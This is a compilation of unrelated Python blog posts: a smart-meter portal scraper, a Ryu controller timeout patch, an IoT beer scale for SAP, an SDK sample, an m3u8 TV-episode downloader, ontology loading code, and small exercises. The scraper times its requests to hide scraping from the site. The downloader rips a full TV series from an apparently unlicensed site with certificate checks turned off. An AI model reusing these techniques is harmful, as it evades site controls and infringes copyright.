soup = BeautifulSoup(r.content, 'html.parser')
authenticity_token = soup.find('input', {'name': 'authenticity_token'}).get('value')
# get the csrf data from the input field
payload = {"utf8": "✓", "authenticity_token": authenticity_token, "user_session[email]": username,
"user_session[password]": password, "commit": "Inloggen"}
c = s.post(login_url, data=payload)
After that is done, it can create the monthly urls to get your xls (excel) data.
It does so by looping the years and months
for y in years:
for m in months:
Where it creates a unique url that contains the xls (excel) data
datum = datetime.date(y, m, 1)
ux = int(time.mktime(datum.timetuple()))
sim = int(seconds_in_month(m, y))
url = "https://slimmemeterportal.nl/cust/consumption/chart.xls?
commodity=power&datatype=consumption&range=" \
"{}×lot_start={}".format(seconds, ux)
filename = "{}-{}.xls".format(y, m)
# print(url)
r = s.get(url)
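One thing this snippet relies on but does not show is the seconds_in_month helper. A minimal sketch of what it could look like, using the standard library (an assumption, not necessarily the author's version):
import calendar

def seconds_in_month(month, year):
    # number of days in the given month times the number of seconds in a day
    days = calendar.monthrange(year, month)[1]
    return days * 24 * 60 * 60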
And when it has the data, it creates a xls file on your harddrive.
with open(filename, 'wb') as f:
f.write(r.content)
Now, to look like a normal user I've put in a sleep mechanism. Otherwise it hits the server too hard and too fast, and the site might think we are doing a DDoS or figure out that we are scraping the server ;-)
time.sleep(5)
Well, that wraps it up. Have fun with the code!
Output slimmemeterportal
Oh one more thing.
You will get this kind of data from the XLS files
Tijdstip    levering totaal [kWh]    teruglevering totaal [kWh]
01-01-17    11,271                   -0,174
02-01-17    6,721                    -2,36
03-01-17    11,457                   -0,13
04-01-17    6,664                    -1,379
05-01-17    6,377                    -3,672
06-01-17    12,752                   -2,47
07-01-17    9,499                    0
Like the code?
|
Today I saw someone raise a question on the Ryu mailing list:
Dear All,
i'm using RYU v3.19 to test Noviflow switch in lab.
[ something i did ]
1. push 21,000 flow through RYU to Novi switch.
2. using curl to query those 21,000 flow.
during my test,
install/get 18000 entry is OK, but with 21,000 flow, ryu can't get all 21,000 entry.
tcpdump on RYU,
can see Novi send much MultiPart_Reply to RYU.
looks like ryu didn't return results to CURL client.
i got empty list, below.
(remainder omitted)
In short: he installed a huge number of flow entries on his switch, then used the Ryu REST API to fetch the flow entries from that switch, and the content that came back was wrong.
My first thought was something I had heard from Rascov before: ONOS runs into errors when there is a large number of flow entries, mainly because the heavy querying fills up the network and then breaks OpenFlow's echo mechanism. But after looking at the pcap and debug message files attached to the mail, I found that this was not what happened here.
So I started tracing from the REST API side to see where the problem was, and took the chance to learn how ofctl is implemented.
There are a few things in ofctl that we need to know about:
waiter: used to receive the replies for one specific query (distinguished by xid)
lock: actually a hub.Event() instance, used to wait for a period of time (the timeout, one second by default)
msgs: used to store the replies that have been received
在呼叫 ofctl_v1_x.get_flow_stats 時,會將 waiter 帶入,要注意的是這一個 waiter 在這一支
應用程式中只會有一個,他所儲存的內容是一個 dict 資料結構,大致的內容如下:
waiters -> {dpid: waiter} : 每一個 switch 都會有對應的 waiter
waiter -> {xid: (lock, msgs)} : 每一個事件回應的 xid 都是在送出事件是就決定好了
因此可以用 xid 推論回送出的事件,並且找出他的回應應該要存在哪邊(msgs),以及決定該事件的 lock
這一個 lock 有兩個用途:
用於等待時間(timeout)
另一個是當這一個 lock 如果有被設定(lock.is_set())的話,則表示該事件有正常的結束回應(收到一個 flag 為 0 的 reply),否則
就將該 waiter 直接移除,隨後相同 xid 的 reply將不會在被收到
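To make that structure concrete, here is an illustrative sketch (not Ryu source) of what waiters holds for a single switch with dpid 1 and one outstanding request with xid 42:
waiters = {
    1: {                   # dpid -> waiter dict for that switch
        42: (lock, msgs),  # xid -> (hub.Event instance, list collecting the replies)
    },
}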
get_flow_stats calls a method named send_stats_request, which looks like this:
def send_stats_request(dp, stats, waiters, msgs):
dp.set_xid(stats)
waiters_per_dp = waiters.setdefault(dp.id, {})
lock = hub.Event()
waiters_per_dp[stats.xid] = (lock, msgs)
dp.send_msg(stats)
lock.wait(timeout=DEFAULT_TIMEOUT)
if not lock.is_set():
del waiters_per_dp[stats.xid]
The parameters are:
dp: the switch the request is sent to
stats: an OpenFlow message, which is given its xid here
waiters: as described above; the lock, msgs and xid are stored inside it
msgs: used to store the received messages
It then sets everything up: waiters gets the dpid -> waiter -> xid -> (lock, msgs) information, the outgoing message is assigned an xid, and the lock is created.
It then calls lock.wait and waits for at most one second.
Here comes the problem: what happens if the lock has waited for one second but the switch has not yet finished sending everything?
As mentioned above, when time is up and lock.is_set() is false, the waiter is deleted, so any messages still coming back are no longer received or stored.
The pcap file attached to the original mail shows the exchange taking longer than one second, which is exactly what triggered this problem.
Solutions
The simplest fix is to increase DEFAULT_TIMEOUT so that there is enough time to receive all the information. That creates another problem, though: if the network is misbehaving and transfers become very slow, say several seconds between messages, we would probably rather abandon that query to avoid blocking the whole application, yet with a longer
timeout a single query now takes several seconds, which makes the program quite inefficient.
Another approach is to reset the lock's timeout every time a reply arrives while keeping the timeout itself short; the time spent on a query then tracks the amount of data the query returns.
Current status
After the reporter increased the timeout the problem went away, but I think the second approach would be the better fix.
HI Sir,
yes!
after change timeout to 5s, i can get all flows.
Thanks for great help
Mark
Follow-up patch
I later brought this up on the Ryu mailing list and attached a patch XD
The main content of the patch:
diff --git a/ryu/lib/ofctl_v1_3.py b/ryu/lib/ofctl_v1_3.py
index 8490206..5b709f3 100644
--- a/ryu/lib/ofctl_v1_3.py
+++ b/ryu/lib/ofctl_v1_3.py
@@ -404,10 +404,18 @@ def send_stats_request(dp, stats, waiters, msgs):
dp.set_xid(stats)
waiters_per_dp = waiters.setdefault(dp.id, {})
lock = hub.Event()
+ previous_msg_len = len(msgs)
waiters_per_dp[stats.xid] = (lock, msgs)
dp.send_msg(stats)
lock.wait(timeout=DEFAULT_TIMEOUT)
+ current_msg_len = len(msgs)
+
+ while current_msg_len > previous_msg_len:
+ previous_msg_len = current_msg_len
+ lock.wait(timeout=DEFAULT_TIMEOUT)
+ current_msg_len = len(msgs)
+
if not lock.is_set():
del waiters_per_dp[stats.xid]
The idea is to change the original hard timeout into idle-timeout logic: every time a new reply arrives we keep waiting,
and if a wait ends without any update there are two possibilities:
The switch really has finished sending everything.
There is actually more to come, but the gap between two replies is too long (perhaps a network problem) and the reply cannot get through; in that case the
timeout serves its real purpose and keeps the whole Ryu app from being blocked.
At the moment (8/6 00:23) the patch has only just been sent and has not been merged yet (they are probably asleep XD), so there may be no result until the morning.
|
Introduction
As promised, I'm continuing my series on my microbrewery. In the following article I will show you how I developed an intelligent beer scale. So sit tight, open yourself a cool IPA, and most of all let me encourage you to write about your own stories.
Previous posts
1 Beer, Beer, Beer – IoT brewing Part 1
2 Beer, Beer, Beer – IoT brewing Part 2
3 Beer, Beer, Beer – IoT brewing Part 3
4 Beer, Beer, Beer – IoT brewing Part 4
Goal / Requirements
In the previous article I stated that my next goal is to connect my refrigerator to an SAP S4/HANA system. First of all I want the ability to record the arrival of new beer as a goods receipt. To determine the amount of beer, I'm planning to use a bathroom scale to record weight changes and automatically update the stock within the ERP.
Hardware
There are many scales that are suitable for this purpose. In order to have as little soldering work as possible, I decided on a Nintendo Wii Balance Board. The main reason I chose this particular device was its Bluetooth capability.
Software
To receive continuous measurements from the Wii board, I wanted to use the gr8w8upd8m8 script by skorokithakis. The program works as follows: during the measuring process, the device stores all measured values as long as the load exceeds 30 kilograms. As soon as the load drops below this value, the measuring process and the Bluetooth connection are terminated. The weight can then be determined by taking the most frequent measured value. The basic functionality of the program met my requirements, but two points did not: on the one hand, I found it disturbing that the connection to the device was dropped after the measurement was completed; on the other hand, I did not want to receive the measurement result only after the weight had been removed from the scale. For this reason I extended the script with additional classes, which allow me to get measured values while the weight is still on the scale and to terminate the Bluetooth connection only when needed. The class can now be used as follows:
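(The original post embedded the usage snippet at this point. Since it is not reproduced here, the following is only an illustrative sketch; WiiScale and its method names are assumptions, not the actual API of the extension.)
scale = WiiScale(address='00:11:22:33:44:55')   # Bluetooth address of the balance board (hypothetical class)
scale.connect()                                 # connection stays open between readings
for _ in range(10):
    print('current weight: %.2f kg' % scale.get_weight())   # read while the load is still on the board
scale.disconnect()                              # drop the Bluetooth connection only when needed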
So far we can measure the required data as needed. In order to access the values via the brew controller, we also need a corresponding extension. Within CraftBeerPi, values are made available via so-called sensors. The sensor I have developed is available in my GitHub repository. Users can define offsets and choose whether the values are reported in kg or lbs. The final result looks as follows:
SAP Cloud Platform IoT Service
We've almost made it; there are only a few tweaks left to do. Now that we're up and running, the next task is to configure the new sensor within SAP Cloud Platform IoT Service for the Cloud Foundry environment. In my second article I described how to configure a sensor using the GUI approach. Since you're already aware of that approach, I will focus on how to achieve the same result using the API. There's a broad variety of tools that do the job (cURL, Invoke-WebRequest, …). For ease of use I'll be using the Chrome extension Postman. In order to complete the setup we have to create a new capability as well as a new sensor type, and link those two entities to the device. Access to the SAP IoT Service API is protected by means of Basic Auth, so we have to configure the security settings within Postman via the "Authorization" tab. To test the configuration we call the capabilities service of the REST API.
https://{{tennant}}.{{zone}}.cp.iot.sap/iot/core/api/v1/capabilities
As our goal is to create a new capability, we use the HTTP POST method. The properties of the new capability are transmitted via the body section of the HTTP request. Based on your requirements you can configure the values as follows:
{
"alternateId": "string",
"id": "string",
"name": "string",
"properties": [
{
"dataType": "integer",
"formatter": {
"dataType": "integer",
"scale": 0,
"shift": 0,
"swap": true
},
"name": "string",
"unitOfMeasure": "string"
}
]
}
After the request has been processed by the service, the capability is returned in the server response. The next step is to create a new sensor type. To link the created capability to the sensor type, set the capability id and type to your specific values.
https://{{tennant}}.{{zone}}.cp.iot.sap/iot/core/api/v1/sensorTypes
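For reference, the request body for the sensor type could look roughly like the sketch below; the exact schema should be checked against the IoT Service API documentation, and the capability id is the one returned by the previous call:
{
  "alternateId": "string",
  "name": "string",
  "capabilities": [
    {
      "id": "<id of the capability created above>",
      "type": "measure"
    }
  ]
}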
The final step on the SAP Cloud Platform is to update the device model. Therefore, we use the HTTP PUT method of the device service.
https://{{tennant}}.{{zone}}.cp.iot.sap/iot/core/api/v1/devices/{{deviceId}}
CraftBeerPi customizing
So far so good. The sensor is collecting real time data and the SAP Cloud Platform is configured to receive its measurements. Now we have to reconfigure the brew controller in order to send additional data to the cloud service. The corresponding background task has to be configured as follows:
import json
import ssl
from MQTTClient import MQTTClient
from modules import cbpi
from modules.base_plugins.one_wire import ONE_WIRE_SENSOR
from modules.plugins.cbpi_Wii import WiiSensor
sap_iot_cfg = { # define SAP IoT Service device properties
'device_alternate_id': 'aabbccddeeffgghhii',
'capability_alternate_id': {
'MashTemperature': '0123456789101112',
'Weight': '1314151617181920'
},
'sensorAlternateId': {
'DS18B20': 'zzyyxxwwvvuutt',
'WiiBoard': 'ttuuvvwwxxyyzz'
}
}
mqttc = MQTTClient({ # init MQTT client
'id': sap_iot_cfg.get('device_alternate_id'),
'host': 'mytennant.zone.cp.iot.sap',
'port': 8883,
'keepalive': 60,
'tls_settings': {
'ca_certs': '/some/dir/certs/ca-certificates.crt',
'certfile': '/some/dir/certs/SAP_IoT/credentials.crt',
'keyfile': '/some/dir/certs/SAP_IoT/credentials.key',
'tls_version': ssl.PROTOCOL_TLSv1_2
}
}).connect()
@cbpi.backgroundtask(key='mqtt_client', interval=2.5) # create bg job with an interval of 2.5 seconds
def mqtt_client_background_task(api):
sensors = cbpi.cache.get('sensors') # read available sensors
for key, value in sensors.iteritems(): # loop over the sensors
topic = 'measures/' + sap_iot_cfg.get('device_alternate_id') # define the MQTT topic
if isinstance(value.instance, WiiSensor):
caid = sap_iot_cfg.get('capability_alternate_id').get('Weight')
said = sap_iot_cfg.get('sensorAlternateId').get('WiiBoard')
if isinstance(value.instance, ONE_WIRE_SENSOR):
caid = sap_iot_cfg.get('capability_alternate_id').get('MashTemperature')
said = sap_iot_cfg.get('sensorAlternateId').get('DS18B20')
data = { # define the playload
'capabilityAlternateId': caid,
'sensorAlternateId': said,
'measures': value.instance.last_value
}
payload = json.dumps(data, ensure_ascii=False) # convert payload to JSON
mqttc.publish(topic, payload) # connect to the MQTT server and publish the payload
Roundup
In this episode we've set up a new CraftBeerPi sensor using some Python code and attached it to the SAP Cloud Platform IoT Service for Cloud Foundry.
Outlook
We now have the ability to measure the values needed to update the stock information. In the next article I will describe how to connect the device to SAP Cloud Platform IoT Application Enablement using the API, and how you can use SAP Cloud Platform Integration together with SAP Cloud Platform Cloud Connector to post the arrival of new beer as a goods receipt in the SAP S4/HANA system.
|
This article briefly describes how to install the Python SDK and provides sample code.
Background
How to install the Python SDK
For how to install the Python SDK, see the Quick Start guide.
The Python SDK installation package can be downloaded from the following address:
Python SDK example
Below is Python SDK sample code for the AssumeRole API. For other APIs, visit OpenAPI Explorer to debug them and obtain sample code.
#!/usr/bin/env python
#coding=utf-8
from aliyunsdkcore.client import AcsClient
from aliyunsdkcore.acs_exception.exceptions import ClientException
from aliyunsdkcore.acs_exception.exceptions import ServerException
from aliyunsdksts.request.v20150401.AssumeRoleRequest import AssumeRoleRequest
# Create an Alibaba Cloud client used to send requests.
# The AccessKey ID and AccessKey Secret must be set when the client is created.
client = AcsClient('<accessKeyId>', '<accessSecret>', 'cn-hangzhou')
# Build the request.
request = AssumeRoleRequest()
request.set_accept_format('json')
# Set the parameters.
request.set_RoleArn("<RoleArn>")
request.set_RoleSessionName("<RoleSessionName>")
# Send the request and get the response.
response = client.do_action_with_exception(request)
# python2: print(response)
print(str(response, encoding='utf-8'))
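As a small follow-up (not part of the original sample), the AssumeRole response is JSON, so the temporary credentials can be extracted like this:
import json

body = json.loads(str(response, encoding='utf-8'))
credentials = body['Credentials']
print(credentials['AccessKeyId'], credentials['AccessKeySecret'], credentials['SecurityToken'])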
|
Python crawler: downloading m3u8 videos
m3u8 files plus ts files are a common setup on many streaming sites. As a crawler practice project, this article records how to use a Python crawler to download video resources from a certain video site.
The first step is to determine the address of the resource to crawl, by finding the resource URL in the page source.
Press F12 to enter developer mode and look for files with the m3u8 suffix; there are two of them. After downloading the first m3u8 file it turns out that its content is the address of the second m3u8; the URL of the second m3u8 is the real one.
So the content of the first m3u8 file is the address of the real m3u8.
The content of the second m3u8 file is the actual addresses of the ts files.
Each episode is made up of multiple ts files; concatenating these ts files gives the complete episode, and the URLs of the ts files are all stored in the second m3u8 file. The overall workflow is therefore:
Get the m3u8 address of the current episode and download the m3u8 file.
Extract the ts video URLs from the m3u8 file.
Download the video segments from the ts URLs.
Merge the ts files into a complete episode and save it to the appropriate path.
Looking at the page source, the m3u8 URLs are stored in a playurls list, and the addresses of every episode of a season are all there, so we only need to extract the URLs of all episodes of the current season from the page source of any single episode:
# Get the m3u8 address of each episode of a season; it only needs to run once per season
def get_m3u8_list(url,S):
req = requests.get(url)
req.encoding = 'utf-8'
html = req.text
# Use a regular expression to find the m3u8 addresses in the page source
res_url = re.findall(r'https:\\/\\/youku.com-youku.net.*?index.m3u8', html, re.S)
m3u8list = []
for i in range(len(res_url)):
url = res_url[i].split('\\')
# The downloaded m3u8 file's content is the real m3u8 address; to save effort, the URL is built manually here
# The real URL just has an extra '1000k/hls', so append it
m3u8list.append(''.join(url[:-1])+'/1000k/hls/index.m3u8')
print(m3u8list[i])
print('Season {}: m3u8 addresses collected'.format(S))
return m3u8list
The usual approach would be to fetch the first-level m3u8 file and then read the real m3u8 address out of it. Analysis shows that the real URL is just the first-level URL with two extra path components (this holds for the current site only; other sites need their own analysis), so it is appended manually here instead of reading the downloaded file.
Once we have the m3u8 file's address we can download it, read its content to get all the ts file URLs of the current episode, and then download them.
# Download the files
def download(m3u8_list,base_path,S): # base_path: "F://Shameless//", S is the current season number
print('Downloading m3u8 files...')
url = base_path+'Shameless_'+'S'+str(S) # F://Shameless//Shameless_S1
path = Path(url)
# Create the folder if it does not exist
if not path.is_dir():
os.mkdir(url)
for i in range(len(m3u8_list)):
print('Downloading episode {}...'.format(i+1))
start = datetime.datetime.now().replace(microsecond=0)
time.sleep(1) # sleep for one second
ts_urls = [] # store the real ts file URLs of this episode
m3u8 = requests.get(url=m3u8_list[i])
content = m3u8.text.split('\n')
# Extract the ts file addresses
for s in content:
if s.endswith('.ts'):
ts_url = m3u8_list[i][:-10] + s.strip('\n') # build the real ts file URL
ts_urls.append(ts_url)
download_ts(ts_urls,down_path=url+'//'+"E"+str(i+1)+'.ts') # download this episode's ts files from their URLs
end = datetime.datetime.now().replace(microsecond=0)
print('Elapsed: %s' % (end - start))
print('Episode {} downloaded...'.format(i+1))
# Download the files from the ts links and merge them into a complete video file
def download_ts(ts_urls,down_path):
file = open(down_path, 'wb') # each ts segment is appended to this file, i.e. merged
for i in tqdm(range(len(ts_urls))):
ts_url = ts_urls[i] # e.g. https://youku.com-youku.net/20180626/14084_f3588039/1000k/hls/80ed70a101f861.ts
time.sleep(1)
try:
response = requests.get(url=ts_url, stream=True, verify=False)
file.write(response.content)
except Exception as e:
print('Request failed: %s' % e.args)
file.close()
The complete code is as follows:
import requests
import re
import os
from pathlib import Path
import time
import datetime
from tqdm import tqdm
import urllib3
urllib3.disable_warnings() # disable certificate verification warnings
# Get the m3u8 address of each episode of a season; it only needs to run once per season
def get_m3u8_list(url,S):
req = requests.get(url)
req.encoding = 'utf-8'
html = req.text
res_url = re.findall(r'https:\\/\\/youku.com-youku.net.*?index.m3u8', html, re.S)
m3u8list = []
for i in range(len(res_url)):
url = res_url[i].split('\\')
# The downloaded m3u8 file's content is the real m3u8 address; for convenience, the URL is built manually here
# The real URL just has an extra '1000k/hls', which is appended manually
m3u8list.append(''.join(url[:-1])+'/1000k/hls/index.m3u8')
print(m3u8list[i])
print('Season {}: m3u8 addresses collected'.format(S))
return m3u8list
# Download the ts files
def download(m3u8_list,base_path,S): # base_path: "F://Shameless//", S is the current season number
print('Downloading m3u8 files...')
url = base_path+'Shameless_'+'S'+str(S) # F://Shameless//Shameless_S1
path = Path(url)
# Create the folder if it does not exist
if not path.is_dir():
os.mkdir(url)
for i in range(len(m3u8_list)):
print('Downloading episode {}...'.format(i+1))
start = datetime.datetime.now().replace(microsecond=0)
time.sleep(1) # sleep for one second
ts_urls = [] # store the real ts file URLs of this episode
m3u8 = requests.get(url=m3u8_list[i])
content = m3u8.text.split('\n')
for s in content:
if s.endswith('.ts'):
ts_url = m3u8_list[i][:-10] + s.strip('\n') # build the real ts file URL
ts_urls.append(ts_url)
download_ts(ts_urls,down_path=url+'//'+"E"+str(i+1)+'.ts') # download this episode's ts files from their URLs
end = datetime.datetime.now().replace(microsecond=0)
print('Elapsed: %s' % (end - start))
print('Episode {} downloaded...'.format(i+1))
# Download files from the ts links
def download_ts(ts_urls,down_path):
file = open(down_path, 'wb')
for i in tqdm(range(len(ts_urls))):
ts_url = ts_urls[i] # e.g. https://youku.com-youku.net/20180626/14084_f3588039/1000k/hls/80ed70a101f861.ts
time.sleep(1)
try:
response = requests.get(url=ts_url, stream=True, verify=False)
file.write(response.content)
except Exception as e:
print('异常请求:%s' % e.args)
file.close()
if __name__ == '__main__':
savefile_path = 'F://Shameless//'
section_url = ['http://www.tv3w.com/dushiqinggan/wuchizhitudiyiji/5-1.html',
'http://www.tv3w.com/dushiqinggan/wuchizhitudierji/3-1.html',
'http://www.tv3w.com/dushiqinggan/wuchizhitudisanji/4-1.html',
'http://www.tv3w.com/dushiqinggan/wuchizhitudisiji/4-1.html',
'http://www.tv3w.com/dushiqinggan/wuchizhitudiwuji/7-1.html',
'http://www.tv3w.com/dushiqinggan/wuchizhitudiliuji/7-1.html',
'http://www.tv3w.com/dushiqinggan/wuchizhitudiqiji/6-1.html']
for i in range(len(section_url)):
print('Starting download of season {}...'.format(i+1))
episode_url = get_m3u8_list(url=section_url[i],S=i+1) # get the m3u8 address of every episode of this season
download(episode_url,savefile_path,i+1) # download and join this season's ts files
print('done')
On the target site the first seven seasons come from the same source, so only the first seven seasons are fetched here.
This is the first complete crawler I have written, and there is plenty of room for improvement:
Fetch the real m3u8 address automatically instead of building it by hand.
Use multithreaded downloads to speed things up (see the sketch below).
Add a file-verification mechanism to make sure downloads are correct.
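As a rough illustration of improvement 2 (this is not part of the original code), the ts segments of one episode could be fetched concurrently with a thread pool and still be written out in their original order:
from concurrent.futures import ThreadPoolExecutor
import requests

def fetch_ts(ts_url):
    # download one segment; verify=False mirrors the behaviour of the original script
    return requests.get(ts_url, stream=True, verify=False).content

def download_ts_concurrent(ts_urls, down_path, workers=8):
    with ThreadPoolExecutor(max_workers=workers) as pool:
        chunks = pool.map(fetch_ts, ts_urls)  # map() preserves the input order
        with open(down_path, 'wb') as f:
            for chunk in chunks:
                f.write(chunk)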
Author: Kangshitao
Link: http://kangshitao.github.io/2021/01/02/crawler-wuchizhitu/index.html
Copyright: all posts on this blog are published under the BY-NC-SA licence; please credit the source when republishing.
|
More Fields, But Less Complexity
We now tackle the ingest of annotations for classes and properties in this installment of the Cooking with Python and KBpedia series. In prior installments we built the structural aspects of KBpedia. We now add the labels, definitions, and other assignments to them.
As with the extraction routines, we will split these efforts into class annotations and then property annotations. Our actual load routines are fairly straightforward, and we have no real logic concerns in how these annotations get added. The most complex wrinkle we need to address is the annotation fields, altLabels and notes in particular, where we potentially have many assignments for a single reference concept (RC) or property. As we saw with the extraction routines, for these items we need to set up additional internal loops that split on our standard double-pipe ('||') delimiter and assign the individual items for loading.
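As a tiny illustration of that convention (the cell value is hypothetical), a single CSV field can pack several values, which we split and append one at a time:
cell = 'auto||automobile||motor car'   # hypothetical altLabel cell from the input CSV
alt_labels = cell.split('||')          # ['auto', 'automobile', 'motor car']
for label in alt_labels:
    print(label)                       # in the build routine each one is appended to id.altLabel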
The two functions we develop in this installment, class_annot_build and prop_annot_build, will be added to the build.py module.
Start-up
Since we are in an active part of the build cycle, we want to continue with our main knowledge graph in-progress for our load routine, so please make sure that kb_src is set to ‘standard’ in your config.py configuration. We then invoke our standard start-up:
from cowpoke.__main__ import *
from cowpoke.config import *
Loading Class Annotations
Class annotations potentially consist of the item's prefLabel, altLabels, definition, and editorialNote. The first item is mandatory, and the next two should be provided to adhere to best practices. The last is optional. There are, of course, other standard annotations possible. Should your own conventions require or encourage them, you will likely need to modify the procedure below to account for that.
As with these methods before, we provide a header showing ‘typical’ configuration settings (in config.py), and then proceed with a method that loops through all of the rows in the input file. Here is the basic class annotation build procedure. There are no new wrinkles in this routine from what has been seen previously:
### KEY CONFIG SETTINGS (see build_deck in config.py) ###
# 'kb_src' : 'standard'
# 'loop_list' : file_dict.values(), # see 'in_file'
# 'loop' : 'class_loop',
# 'in_file' : 'C:/1-PythonProjects/kbpedia/v300/build_ins/classes/Generals_annot_out.csv',
# 'out_file' : 'C:/1-PythonProjects/kbpedia/v300/target/ontologies/kbpedia_reference_concepts_test.csv',
def class_annot_build(**build_deck):
print('Beginning KBpedia class annotation build . . .')
loop_list = build_deck.get('loop_list')
loop = build_deck.get('loop')
class_loop = build_deck.get('class_loop')
# r_id = ''
# r_pref = ''
# r_def = ''
# r_alt = ''
# r_note = ''
if loop != 'class_loop':
print("Needs to be a 'class_loop'; returning program.")
return
for loopval in loop_list:
print(' . . . processing', loopval)
in_file = loopval
with open(in_file, 'r', encoding='utf8') as input:
is_first_row = True
reader = csv.DictReader(input, delimiter=',', fieldnames=['id', 'prefLabel', 'altLabel', 'definition', 'editorialNote'])
for row in reader:
r_id_frag = row['id']
id = getattr(rc, r_id_frag)
if id == None:
print(r_id_frag)
continue
r_pref = row['prefLabel']
r_alt = row['altLabel']
r_def = row['definition']
r_note = row['editorialNote']
if is_first_row:
is_first_row = False
continue
id.prefLabel.append(r_pref)
id.definition.append(r_def)
i_alt = r_alt.split('||')
if i_alt != ['']:
for item in i_alt:
id.altLabel.append(item)
i_note = r_note.split('||')
if i_note != ['']:
for item in i_note:
id.editorialNote.append(item)
print('KBpedia class annotation build is complete.')
class_annot_build(**build_deck)
kb.save(file=r'C:/1-PythonProjects/kbpedia/v300/targets/ontologies/kbpedia_reference_concepts_test.owl', format='rdfxml')
BTW, when we commit this method to our build.py module, we will add the save routine at the end.
Loading Property Annotations
We now turn our attention to annotations of properties:
### KEY CONFIG SETTINGS (see build_deck in config.py) ###
# 'kb_src' : 'standard'
# 'loop_list' : prop_dict.values(), # see 'in_file'
# 'loop' : 'property_loop',
# 'in_file' : 'C:/1-PythonProjects/kbpedia/v300/build_ins/properties/prop_annot_out.csv',
# 'out_file' : 'C:/1-PythonProjects/kbpedia/v300/target/ontologies/kbpedia_reference_concepts_test.csv',
def prop_annot_build(**build_deck):
print('Beginning KBpedia property annotation build . . .')
loop_list = build_deck.get('loop_list')
loop = build_deck.get('loop')
out_file = build_deck.get('out_file')
if loop != 'property_loop':
print("Needs to be a 'property_loop'; returning program.")
return
for loopval in loop_list:
print(' . . . processing', loopval)
in_file = loopval
with open(in_file, 'r', encoding='utf8') as input:
is_first_row = True
reader = csv.DictReader(input, delimiter=',', fieldnames=['id', 'prefLabel', 'subPropertyOf', 'domain',
'range', 'functional', 'altLabel', 'definition', 'editorialNote'])
for row in reader:
r_id = row['id']
r_pref = row['prefLabel']
r_dom = row['domain']
r_rng = row['range']
r_alt = row['altLabel']
r_def = row['definition']
r_note = row['editorialNote']
r_id = r_id.replace('rc.', '')
id = getattr(rc, r_id)
if id == None:
print(r_id)
continue
if is_first_row:
is_first_row = False
continue
id.prefLabel.append(r_pref)
i_dom = r_dom.split('||')
if i_dom != ['']:
for item in i_dom:
id.domain.append(item)
if 'owl.' in r_rng:
r_rng = r_rng.replace('owl.', '')
r_rng = getattr(owl, r_rng)
id.range.append(r_rng)
elif r_rng == '':
continue
else:
pass
# id.range.append(r_rng)
i_alt = r_alt.split('||')
if i_alt != ['']:
for item in i_alt:
id.altLabel.append(item)
id.definition.append(r_def)
i_note = r_note.split('||')
if i_note != ['']:
for item in i_note:
id.editorialNote.append(item)
print('KBpedia property annotation build is complete.')
prop_annot_build(**build_deck)
Hmmm. One of the things we notice in this routine is that our domain and range assignments were not adequately picked up in our earlier KBpedia version 2.50 build routines (the ones undertaken in Clojure before this CWPK series). As a result, we cannot adequately test range and will need to address this oversight before our series is over.
As before, we will add our ‘save’ routine as well when we commit the method to the build.py module.
kb.save(file=r'C:/1-PythonProjects/kbpedia/v300/targets/ontologies/kbpedia_reference_concepts_test.owl', format='rdfxml')
We now have all of the building blocks to create our extract-build roundtrip. We summarize the formal steps and configuration settings in CWPK #47. But, first, we need to return to cleaning our input files and instituting some unit tests.
|
Printing the rightmost node of each level of a binary tree
This is really just a variation of level-order traversal of a binary tree, with one extra step: output the last node of each level. For the tree below, the rightmost-node result should be [3,20,7].
First, look at level-order traversal of a binary tree, using a queue to store the nodes.
The level-order traversal implementation:
def levelOrder(self, root: TreeNode) -> List[List[int]]:
list = []
if root is None:return list
queue = [root]
while queue:
cur = []
for i in range(len(queue)):
node = queue.pop(0)
if node.left:
queue.append(node.left)
if node.right:
queue.append(node.right)
cur.append(node.val)
list.append(cur)
return list
Printing the rightmost node of each level of the binary tree:
# Print the rightmost node of each level of the binary tree
def printRightNode(self, root):
queue = [root]
list = []
while queue:
res = []
# iterate over the nodes of the current level
for i in range(len(queue)):
node = queue.pop(0)
if node.lchild:
queue.append(node.lchild)
if node.rchild:
queue.append(node.rchild)
res.append(node.key)
list.append(res)
ans = []
for i in list:
# the last node of each level is the rightmost node
ans.append(i[-1])
print(ans)
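As a small usage sketch (the node class with key/lchild/rchild attributes is assumed, matching the second snippet), the example tree whose rightmost nodes are [3, 20, 7] can be built and checked like this:
class Node:
    def __init__(self, key):
        self.key = key
        self.lchild = None
        self.rchild = None

root = Node(3)
root.lchild = Node(9)
root.rchild = Node(20)
root.rchild.lchild = Node(15)
root.rchild.rchild = Node(7)
# printRightNode(root) would print [3, 20, 7]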
|
This article covers the difference between raw_input and input in Python 2 and Python 3, and how to use regular expressions together with input to read one-dimensional and two-dimensional arrays from the keyboard.
raw_input and input
In Python 2
raw_input_A = raw_input("raw_input: ")
type(raw_input_A)
You can see that the output type is str.
input_A = input("Input: ") # letters cannot be entered
type(input_A)
You can see that the output type is int, and we find that input cannot accept letters at all; entering abc raises NameError: name 'abc' is not defined.
Looking at the Built-in Functions documentation, we learn:
`input([prompt])
Equivalent to eval(raw_input(prompt)) `
input() is essentially implemented with raw_input(): it calls raw_input() and then calls eval() on the result, so you can even pass an expression as the argument to input(), and it will evaluate the expression and return its value.
The Built-in Functions page does, however, contain this sentence: Consider using the raw_input() function for general input from users.
Unless you specifically need input(), raw_input() is generally the recommended way to interact with users.
In Python 3
For the reason just mentioned, input wasn't really necessary, so it was reworked.
Simply put, raw_input is gone and only input remains; today's input is the old raw_input.
Looking at the official Python documentation for [input([prompt])](https://docs.python.org/3/library/functions.html#input), we learn:
If the prompt argument is present, it is written to standard output without a trailing newline. The function then reads a line from input, converts it to a string (stripping a trailing newline), and returns that. When EOF is read, EOFError is raised.
In short, the return value is always a str, and whatever prompt you put in the parentheses is printed as the prompt, like the --> below.
>>> s = input('--> ')
--> Monty Python's Flying Circus
>>> s
"Monty Python's Flying Circus"
Since I normally use Python 3, everything that follows assumes Python 3.
Entering arrays in Python
One-dimensional arrays
Use int() to force the type conversion.
When the input is not a number the conversion fails, the except branch is taken, and the loop exits.
First declare data as a list, then add each input_A to it.
data = []
while True:
try:
input_A = int(input("Input: "))
data +=[input_A]
except:
break
data
type(data)
Building on the above, we can use Python to read a two-dimensional array.
Entering a two-dimensional array in Python
The regular expression splits on non-digit characters, so it doesn't matter what you insert between the numbers.
import re
data2D = []
while True:
userInput = input('Input:') # enter one row, numbers separated by spaces
info = re.split(r'[\D]',userInput) # split with a regular expression
data = [] # define a one-dimensional array
try:
for number in info:
data+=[int(number)] # append the number to the one-dimensional array
data2D+=[data] # append the one-dimensional array to the two-dimensional one
except:
break;
data2D
Written by mmmwhy; last edited: May 21, 2018 at 10:12 pm
|
